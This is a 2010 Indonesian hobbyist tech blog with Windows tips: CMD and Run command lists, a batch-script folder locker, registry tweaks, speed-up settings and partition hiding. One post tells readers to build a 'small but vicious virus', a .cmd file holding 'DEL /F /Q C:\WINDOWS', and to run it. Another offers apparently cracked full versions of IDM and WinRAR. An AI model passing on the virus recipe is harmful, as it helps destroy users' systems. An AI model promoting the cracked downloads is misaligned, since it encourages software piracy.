Jumat, 29 Oktober 2010

Cara Membuat Password Dokumen

Kita kach ga mo Dokumen yang susah payah kita bikin Dicuri orang
Ini Hasil iseng - iseng semata
Langsung aja ya...

1. Klik Save As
2. Cari Tools (klik 2x) > Pilih General Options

3. Tulis dach password yang kamu suka
4. Maka hasilnya seperti ini..
 kalo anda menbuat 2 password hasilnya akan seperti diaatas..

Cridit : Buku....!

Kamis, 21 Oktober 2010

Internet Download Manager 5.18 dan Winrar 4.65 Full Versi

Langsung aja ni gan yang mo IDM sama Winrar 4.65 Full Versi

JaniEnCieL Download Sekarang

Tutor udah ada di dalam....!!!

Selasa, 19 Oktober 2010

Command List Windows XP

postingan ini tentang command list yang bisa kita gunakan di windows XP (kalau windows vista sama windows 7 belum saya coba, kalau ada yang sudah pernah mencoba bisa share disiniWink
  • untuk mencobanya, anda bisa langsung menggunakan fasilitas Run dengan klik tombol start menu > Run (bisa juga dengan menekan lambang windows + R)
  • lalu anda tinggal mengetikkan run command yang sudah saya sediakan dibawah ini(hanya mengetikkan kata sebelum tanda strip saja.
  • contoh seperti ini :
    compmgmt.msc - Computer management

    setelah itu klik tombol OK sehingga muncul layar seperti ini : 

    begitu juga dengan commands yang lain dibawah ini :

    • Run Commands :
    • compmgmt.msc - Computer management
    • devmgmt.msc - Device manager
    • diskmgmt.msc - Disk management
    • dfrg.msc - Disk defrag
    • eventvwr.msc - Event viewer
    • fsmgmt.msc - Shared folders
    • gpedit.msc - Group policies
    • lusrmgr.msc - Local users and groups
    • perfmon.msc - Performance monitor
    • rsop.msc - Resultant set of policies
    • secpol.msc - Local security settings
    • services.msc - Various Services
    • msconfig - System Configuration Utility
    • regedit - Registry Editor
    • msinfo32 - System Information
    • sysedit - System Edit
    • win.ini - windows loading information(also system.ini)
    • winver - Shows current version of windows
    • mailto: - Opens default email client
    • command - Opens command prompt
    Run Commands untuk mengakses kontrol panel :
    • appwiz.cpl - Add/Remove Programs control
    • timedate.cpl - Date/Time Properties control
    • desk.cpl - Display Properties control
    • findfast.cpl - FindFast control
    • inetcpl.cpl – Internet Properties control
    • main.cpl keyboard - Keyboard Properties control
    • main.cpl - Mouse Properties control
    • mmsys.cpl - Multimedia Properties control
    • netcpl.cpl - Network Properties control
    • password.cpl - Password Properties control
    • mmsys.cpl sounds - Sound Properties control
    • sysdm.cpl - System Properties control
    jika kedua commands di atas dijalankan pada menu run, command yang dibawah ini adalah commands yang bisa difungsikan pada commant prompt. caranya dengan klik tombol
    start > All program > accesorris > CMD


    atau
    Start > Run > ketik : cmd > OK
    sehingga nanti akan terlihat seperti ini :


    nah, disitulah kode-kode di bawah ini bisa difungsikanOpen-mouthed
    Command Prompt : 

    • ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys.
    • APPEND Causes MS-DOS to look in other directories when editing a file or running a command.
    • ARP Displays, adds, and removes arp information from network devices.
    • ASSIGN Assign a drive letter to an alternate letter.
    • ASSOC View the file associations.
    • AT Schedule a time to execute commands or programs.
    • ATMADM Lists connections and addresses seen by Windows ATM call manager.
    • ATTRIB Display and change file attributes.
    • BATCH Recovery console command that executes a series of commands in a file.
    • BOOTCFG Recovery console command that allows a user to view, modify, and rebuild the boot.ini
    • BREAK Enable / disable CTRL + C feature.
    • CACLS View and modify file ACL's.
    • CALL Calls a batch file from another batch file.
    • CD Changes directories.
    • CHCP Supplement the International keyboard and character set information.
    • CHDIR Changes directories.
    • CHKDSK Check the hard disk drive running FAT for errors.
    • CHKNTFS Check the hard disk drive running NTFS for errors.
    • CHOICE Specify a listing of multiple options within a batch file.
    • CLS Clears the screen.
    • CMD Opens the command interpreter.
    • COLOR Easily change the foreground and background color of the MS-DOS window.
    • COMP Compares files.
    • COMPACT Compresses and uncompress files.
    • CONTROL Open control panel icons from the MS-DOS prompt.
    • CONVERT Convert FAT to NTFS.
    • COPY Copy one or more files to an alternate location.
    • CTTY Change the computers input/output devices.
    • DATE View or change the systems date.
    • DEBUG Debug utility to create assembly programs to modify hardware settings.
    • DEFRAG Re-arrange the hard disk drive to help with loading programs.
    • DEL Deletes one or more files.
    • DELETE Recovery console command that deletes a file.
    • DELTREE Deletes one or more files and/or directories.
    • DIR List the contents of one or more directory.
    • DISABLE Recovery console command that disables Windows system services or drivers.
    • DISKCOMP Compare a disk with another disk.
    • DISKCOPY Copy the contents of one disk and place them on another disk.
    • DOSKEY Command to view and execute commands that have been run in the past.
    • DOSSHELL A GUI to help with early MS-DOS users.
    • DRIVPARM Enables overwrite of original device drivers.
    • ECHO Displays messages and enables and disables echo.
    • EDIT View and edit files.
    • EDLIN View and edit files.
    • EMM386 Load extended Memory Manager.
    • ENABLE Recovery console command to enable a disable service or driver.
    • ENDLOCAL Stops the localization of the environment changes enabled by the setlocal command.
    • ERASE Erase files from computer.
    • EXIT Exit from the command interpreter.
    • EXPAND Expand a M*cros*ft Windows file back to it's original format.
    • EXTRACT Extract files from the M*cros*ft Windows cabinets.
    • FASTHELP Displays a listing of MS-DOS commands and information about them.
    • FC Compare files.
    • FDISK Utility used to create partitions on the hard disk drive.
    • FIND Search for text within a file.
    • FINDSTR Searches for a string of text within a file.
    • FIXBOOT Writes a new boot sector.
    • FIXMBR Writes a new boot record to a disk drive.
    • FOR Boolean used in batch files.
    • FORMAT Command to erase and prepare a disk drive.
    • FTP Command to connect and operate on a FTP server.
    • FTYPE Displays or modifies file types used in file extension associations.
    • GOTO Moves a batch file to a specific label or location.
    • GRAFTABL Show extended characters in graphics mode.
    • HELP Display a listing of commands and brief explanation.
    • IF Allows for batch files to perform conditional processing.
    • IFSHLP.SYS 32-bit file manager.
    • IPCONFIG Network command to view network adapter settings and assigned values.
    • KEYB Change layout of keyboard.
    • LABEL Change the label of a disk drive.
    • LH Load a device driver in to high memory.
    • LISTSVC Recovery console command that displays the services and drivers.
    • LOADFIX Load a program above the first 64k.
    • LOADHIGH Load a device driver in to high memory.
    • LOCK Lock the hard disk drive.
    • LOGON Recovery console command to list installations and enable administrator login.
    • MAP Displays the device name of a drive.
    • MD Command to create a new directory.
    • MEM Display memory on system.
    • MKDIR Command to create a new directory.
    • MODE Modify the port or display settings.
    • MORE Display one page at a time.
    • MOVE Move one or more files from one directory to another directory.
    • MSAV Early M*cros*ft Virus scanner.
    • MSD Diagnostics utility.
    • MSCDEX Utility used to load and provide access to the CD-ROM.
    • NBTSTAT Displays protocol statistics and current TCP/IP connections using NBT
    • NET Update, fix, or view the network or network settings
    • NETSH Configure dynamic and static network information from MS-DOS.
    • NETSTAT Display the TCP/IP network protocol statistics and information.
    • NLSFUNC Load country specific information.
    • NSLOOKUP Look up an IP address of a domain or host on a network.
    • PATH View and modify the computers path location.
    • PATHPING View and locate locations of network latency.
    • PAUSE Command used in batch files to stop the processing of a command.
    • PING Test / send information to another network computer or network device.
    • POPD Changes to the directory or network path stored by the pushd command.
    • POWER Conserve power with computer portables.
    • PRINT Prints data to a printer port.
    • PROMPT View and change the MS-DOS prompt.
    • PUSHD Stores a directory or network path in memory so it can be returned to at any time.
    • QBASIC Open the QBasic.
    • RD Removes an empty directory.
    • REN Renames a file or directory.
    • RENAME Renames a file or directory.
    • RMDIR Removes an empty directory.
    • ROUTE View and configure windows network route tables.
    • RUNAS Enables a user to execute a program on another computer.
    • SCANDISK Run the scandisk utility.
    • SCANREG Scan registry and recover registry from errors.
    • SET Change one variable or string to another.
    • SETLOCAL Enables local environments to be changed without affecting anything else.
    • SETVER Change MS-DOS version to trick older MS-DOS programs.
    • SHARE Installs support for file sharing and locking capabilities.
    • SHIFT Changes the position of replaceable parameters in a batch program.
    • SHUTDOWN Shutdown the computer from the MS-DOS prompt.
    • SMARTDRV Create a disk cache in conventional memory or extended memory.
    • SORT Sorts the input and displays the output to the screen.
    • START Start a separate window in Windows from the MS-DOS prompt.
    • SUBST Substitute a folder on your computer for another drive letter.
    • SWITCHES Remove add functions from MS-DOS.
    • SYS Transfer system files to disk drive.
    • TELNET Telnet to another computer / device from the prompt.
    • TIME View or modify the system time.
    • TITLE Change the title of their MS-DOS window.
    • TRACERT Visually view a network packets route across a network.
    • TREE View a visual tree of the hard disk drive.
    • TYPE Display the contents of a file.
    • UNDELETE Undelete a file that has been deleted.
    • UNFORMAT Unformat a hard disk drive.
    • UNLOCK Unlock a disk drive.
    • VER Display the version information.
    • VERIFY Enables or disables the feature to determine if files have been written properly.
    • VOL Displays the volume information about the designated drive.
    • XCOPY Copy multiple files, directories, and/or drives from one location to another.
    • TRUENAME When placed before a file, will display the whole directory in which it exists
    • TASKKILL It allows you to kill those unneeded or locked up applications


    Cridit : Ihsan's

Download Program untuk mengubah file .bat menjadi .exe





kalo file.bat nya di pindah (cut-paste) ke lokasi lain, file-file di dalam locker akan hilang, gimana tuh?

pemindahan file.bat tidak mempengaruhi file yang telah kita sembunyikan di dalam locker. jadi tidak perlu khawatir jika file .bat yang telah anda buat dipindahkan bahkan dihapus oleh orang lain secara tidak sengaja, atau anda secara tidak sengaja menghapusnya. Jika file .bat telah dipindahkan atau dihapus sekalipun anda tinggal membuat file .bat yang baru dengan cara yang sama seperti yang telah saya jelaskan pada postingan cara mengunci folder tanpa software sebelumnya.
kalo file .bat nya di-edit (klik kanan trus open with notepad), passwordnya masih bisa diedit secara manual, berbahaya kan?
password memang masih bisa kita edit secara manual jika formatnya .bat . Jika ingin passwordnya tidak bisa diedit secara manual kita harus merubah file .bat menjadi .exe terlebih dahulu, sehingga tidak bisa lagi di ubah passwordnya secara manual melalui cara klik kanan > edit. Cara merubahnya bisa dengan cara menggunakan program bat to exe converter yang bisa anda download pada link pada akhir postingan ini. Akan tetapi jika keadaan tidak memungkinkan untuk download, anda bisa memindahkan file .bat ke tempat lain dan ketika ingin membuka folder locker tinggal anda pindahkan lagi ke tempat semula
Sedikit tutorial cara penggunaan program :






1. Batchfile : tempat anda menyimpan file.bat yang ingin diconvert ke file .exe
2. Iconfile : tempat anda menyimpan icon yang akan menjadi icon file .exe setelah di compile ( jika tidak punya file icon langkah ini bisa dilewatkan dan biarkan kosong saja / optional )
3. Save as : tempat penyimpanan file .exe yang akan kita compile
Apabila semua telah anda tentukan, sekarang tinggal tekan tombol compile dan file .bat telah berubah menjadi .exe di folder yang telah anda tentukan pada menu save as sehingga tidak bisa di edit lagi oleh orang lain.
selamat mencoba, semoga bermanfaat!
Download Sini Aja Gan Thank atas partisipasinya... 

Cara Mengunci Folder Tanpa Software


Tak usah basa basi....

untuk mengunci folder tanpa sofware ini sangatlah mudah, caranya adalah sebagai berikut :
1. Buatlah sebuah notepad kosong atau new text document.txt di directory mana saja di computer atau laptop anda. Anda boleh memberi nama apa saja untuk new text document tersebut.
2. Setelah itu anda tinggal meng-copy script yang telah saya sediakan di bawah ini :

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure you want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


3. Setelah anda selesai meng-copy, buka kembali notepad yang telah anda buat tadi dan Paste script ini di dalamnya.
4. buka notepad tadi dan ganti kata type your password here dengan password untuk membuka folder pada nantinya dan setelah selesai simpan script-nya dan ubah ekstensi file yang telah terdapat script tersebut dari ekstensi file ***.txt menjadi ***.bat
5. Double klik pada file tersebut dan beberapa detik kemudian akan muncul sebuah folder yang bernama Locker .
6. Simpanlah file-file anda yang ingin anda kunci di dalam folder yang bernama locker tersebut. Di dalam folder tersebut bisa kita letakkan file apa saja yang kita inginkan dengan ekstensi file yang berbeda. Baik itu file gambar, music, video, document, dan file-file lainnya.
7. Setelah semua file yang diinginkan tersimpan. Double klik pada script di notepad yang telah anda buat menjadi ***.bat . Lalu akan muncul tulisan are you sure want to lock the folder?(Y/N). Ketik “y” dan tekan enter untuk yes dan ketik “n” lalu tekan enter untuk no. Sekedar informasi tulisan are you sure want to lock the folder? yang ada pada script awal (default) bisa kita ubah sesuai keinginan kita. Seperti : apakah saudara yakin ingin mengunci folder ini? dan sebagainya.
8. Jika yang anda simpan adalah file penting, usahakan file yang anda simpan ini jangan sampai didelete oleh orang lain. Anda bisa mengantisipasinya dengan mengaktifkan fasilitas hidden file dan tidak menampakkan file-file yang ter-hidden sehingga orang lain tidak bisa menghapus file anda

Cridit : Ihsan's



Cara Mencegah Copy/Cut File Dari Komputer ke Flashdisk

1. Masuk ke Regedit ( Klik Start > Run > Tulis Regedit)
2. Masuk ke HKEY_LOCALMACHINESYSTEM > Current > ControlSet > Control
3. Klik kanan pada folder Control pilih New > Key
4. Beri nama folder baru itu dengan “StorageDevicePolicies”
5. Lalu klik kanan di folder dengan nama “StorageDevicePolicies”,lalu pilih New > Dword(
6. Beri nama “WriteProtect”
7. Klik 2x Dword dengan nama “WriteProtect” tersebut, lalu ganti Value Data menjadi 1
8. Restart Komputer andaBerikut pesan yang tampil ada seseorang mencoba copy/cut data dari anda untuk dimasukkan di flashdisk

*. Untuk mengembalikan seperti semula anda tinggal mengganti Value Data dari key “WriteProtect” menjadi 0

Jumat, 15 Oktober 2010

Mempercepat Koneksi Internet "Ga Lelet"

Aku orangnya ga suka banyak ngomong keni ngomong kesana... langsung aja ya.

Langkah pertama..
1. Klik Start > Run > tulis "gpedit.msc" tanpa tanda petik > Ok
2. Cari Administrative Templates > Network > QoS Packet Scheduler > Limit outstanding packets
3. Pilih Enabled > Ganti Number of packets "0" lalu Ok
4.Kalo udah selesai Restart Komputer kamu

Langkah Kedua..
1. Klik menu Start > Run > tulis "regedit" anpa tanda petik > Ok
2.  Cari HKEY_LOCAL_MACHINE > SYSTEM > Current ControlSet > Services > Tcpip > ServiceProvider
3. Setelah kita berada di direktori ServiceProvider ubah nilai-nilai dibawah ini semuanya menjadi 1.
        DnsPriority=1
        HostsPriority=1
        LocalPriority=1
        NetbtPriority=1
4. Tutup registry restart komputer.

Langkah Ketiga Cara hack Mozilla

Klil "about:config" tanpa tanda petik pada link mozilla > Inter
Klik I'll be careful, I promise !

Trus Copy Paste Kata dibawah dan tempatkan pada Filter
accessibility.browsewithcaret  > "true"
accessibility.typeaheadfind.flashBar > "0"
network.http.max-persistent-connections-per-server > "8"
network.http.max-connections-per-server > "32"
network.http.pipelining > "true"
network.http.pipelining.ssl > "true"
network.http.pipelining.maxrequests > "30"
network.http.proxy.pipelining > "true"
Klik kanan New > Integer > nglayout.initialpaint.delay > "0"

restart firefox anda....


Parameter-parameter setting :

I. Untuk pengguna Dial Up

    Set “browser.cache.disk_cache_ssl : true”
    Set “browser.xul.error_pages.enabled : true”
    Set “network.http.max-connections : 32?
    Set “network.http.max-connections-per-server : 8?
    Set “network.http.max-persistent-connections-per-proxy : 8?
    Set “network.http.max-persistent-connections-per-server : 4?
    Set “network.http.pipelining : true”
    Set “network.http.pipelining.maxrequests : 8?
    Set “network.http.proxy.pipelining : true”
    Set “plugin.expose_full_path : true”
    Set “signed.applets.codebase_principal_support : true”
    Set “content.interrupt.parsing : true”
    Set “content.max.tokenizing.time : 3000000?
    Set “content.maxtextrun : 8191?
    Set “content.notify.backoffcount : 5?
    Set “content.notify.interval : 750000?
    Set “content.notify.ontimer : true”
    Set “content.switch.threshold : 750000?

II. Untuk pengguna DSL :

    Set “network.http.pipelining : true”
    Set “network.http.proxy.pipelining : true”
    Set “network.http.pipelining.maxrequests : 64?
    Set “nglayout.initialpaint.delay : 0?

III. Untuk pengguna ADSL :

    Set “network.http.max-connections : 64?
    Set “network.http.max-connections-per-server : 21?
    Set “network.http.max-persistent-connections-per-server : 8?
    Set “network.http.pipelining : true”
    Set “network.http.pipelining.maxrequests : 100?
    Set “network.http.proxy.pipelining : true”
    Set “nglayout.initialpaint.delay : 0?

Shortcut untuk mempercepat browsing  :

    Ctrl+Enter, ini untuk membuka domain yang menggunakan .com. caranya adalah ketikkan nama domainnya saja 
               (tidak perlu menambahkan “http://www” dan akhiran .com) kemudian klik ctrl+enter. Contohnya,
               jika kita ingin membuka “http://www.google.com” jadi ketiklah “google” tanpa tanda petik yaaa 
               kemudian klik ctrl+enter.

    Shift+Enter, ini untuk membuka domain yang menggunakan .net. caranya adalah ketikkan nama domainnya saja
                kemudian klik shif+enter. Contoh, jika ingin membuka “http://www.telkom.net”  maka cukup ketiklah
                “telkom” tanpa tanda petik yaaa kemudian klik shif+enter.

    Ctrl+Shift+Enter, ini untuk membuka domain yang menggunakan .org. caranya adalah ketikkan nama domainnya
                    saja kemudian klik Ctrl+Shift+Enter. Misal, anda ingin membuka “www.wordpress.org” jadi cukup ketiklah
                    “wordpress” tanpa tanda petik yaaa kemudian klik Ctrl+Shift+Enter.



Hidden File

Buka Start Menu | Run, ketik : regedit, kik OK.

 1.Buka registry dengan direktorinya : KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
 2.Cari key yang bernama CheckedValue dan DefaultValue.
 3.Klik dua kali dan berikan nilai satu pada kedua key tersebut.
 4.Kemudian buka lagi Folder Options…|View, pilih “Show hidden files and folders”, klik Apply (atau OK).

Cara Membuat Virus Kecil Tapi Ganas

Sobatku sekalian!, sekarang kita mempelajari virus yang dapat menghapus system (kita mulai dari OS Windows aja ya!, nanti kalian kembangkan sendiri). Caranya : evil
1. buka aplikasi "Notepad",tau caranya khan?!

2. Tulis/Copy rumus dibawah ini!:

DEL /F /Q C:\WINDOWS (simple kan?)

3. sekarang simpan dalam format .cmd, caranya : pada bagian "File nama" tulis virusganas.cmd dan "Save as type" pilih "All Files",

klik "Save" deh!. Coba jalankan virus ini!, paling juga sekarang kalian harus nginstall ulang OS untuk komputer kalian. Hehe...

Cridit : Mbah Google

Cara Meng-Hidden Partasi

1. Buka Start -> Run -> ketik “diskpart”(tanpa tanda kutip), lanjut dengan meng-klik “OK”,

2. Lalu ketik “list volume”(tanpa tanda kutip) , dan tekan “Enter”

3. Bila kawan-kawan, mau menghilangkan partisi pada “E”, silahkan ketik “select volume 3″(tanpa tanda kutip)

4. Lalu lanjut ketik “remove letter E” (Perlu di perhatikan, pada pengetikan point ke-4 kata “E” harus berhuruf besar.)

5. Kalau sudah silahkan kawan-kawan untuk mencek partisinya di Windows Explore (bukan di Internet Explore). Kalau partisi yang di hidden masih muncul, silahkan kawan-kawan me-restart.

Untuk menormalkan kembali partisinya, cukup mudah hanya dengan mengikuti langkah diatas.Pada point ke-4 “remove letter E”-nya diganti dengan perintah “assign letter E”.

NB : Mohon diteliti saat memproses lanhkah - langkah diatas.
(Tips ini juga bergua untuk para bagi orang - orang yang usaha warnet)
 
Cridit : Mbah Google